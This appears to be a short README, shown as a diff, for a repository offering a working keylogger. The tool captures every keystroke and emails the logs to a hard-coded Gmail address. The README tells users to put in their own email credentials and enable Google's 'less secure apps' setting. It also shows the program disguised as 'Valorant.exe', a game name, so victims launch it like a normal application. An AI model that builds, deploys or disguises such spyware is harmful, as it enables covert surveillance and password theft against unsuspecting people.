Nyu10/KeyLogger-Virus-WORKING-/README.md

 Begin typing anywhere and your keyboard strokes will be sent in an email to the email listed in the program file (stuyhackerdemo@gmail.com).
 Click ESC key to end process.

+To send the email logs to your own email, you need to change the email and password in your code.
+Also, [Turn Allow less secure apps to ON.](https://myaccount.google.com/lesssecureapps) Be aware that this makes it easier for others to gain access to your account.

 **Valorant.exe**
 ```
 ./Valorant.exe in command prompt or double click on icon like a normal application